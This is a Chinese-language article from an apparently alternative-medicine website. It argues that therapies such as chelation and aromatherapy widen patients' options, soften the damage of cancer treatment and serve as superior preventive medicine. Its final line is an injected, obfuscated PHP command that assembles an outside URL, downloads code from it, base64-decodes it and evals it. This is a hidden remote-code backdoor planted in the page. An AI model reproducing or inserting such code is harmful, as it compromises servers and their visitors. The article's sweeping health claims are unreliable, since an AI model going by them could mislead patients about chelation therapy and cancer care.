收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 另類醫學給患者多一個選擇
另類醫學給患者多一個選擇 列印 E-mail
        不過,我必須很坦白的說,「藥治不死病」,醫學未能治好的疾病,或許只是當時未選對正確的藥物而已;主流醫學如此,另類醫學亦然!那麼,另類醫學的價值又何在?

        首先,它提供患者另一種就醫的選擇。當我們在主流醫學裡無法治好,或對治療結果未盡滿意的病情,也許用中醫治得好、用螯合療法治得好,或用醫學芳香療法治得好;但另類醫學也沒有辦法治好天下所有的病──Nothing is everything!同樣道理,在另類醫學裡無法治癒的病,也許用西醫便治得好!

因此另類醫學的價值在於「提供人類『醫療多樣化』的選擇」。我曾出版一本書,名為「你的醫療選擇權」,談的就是這種觀點。從另類醫學中找出最正確而適當的方式,來治療「可以被治療」的疾病,提供不同療法與療法使用順序的變化,而達到更佳的治療效果。

        其次,另類醫學可以做為患者很好的照護。譬如我們說癌症可以手術或化療,但手術和化療在消滅病源的同時,對於身體及元氣同樣具有強大的殺傷力;此時選對另類醫學的項目,可以將這種傷害降到最低,並且在術後以最快的速度恢復患者的生活品質,讓他的身心都能在最安穩舒適的狀態下休養生息。

而最好的是,它可以在疾病尚未形成之前,防患於未然,即所謂「上醫治未病」。如果我們以「0」來表示健康,而「10」表示疾病的產生,那麼「1~9」之間則代表了不同程度的「症狀」。這些症狀往往是發病的前奏,但主流醫學的現代儀器多半僅能以「0」或「10」,即健康或疾病、正常或不正常的二分法來做判讀,易忽略「1~9」這段疾病未生成的黃金時機。另類醫學正可補強這個部份,成為最好的「預防醫學」,為人類的健康做好把關的動作。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));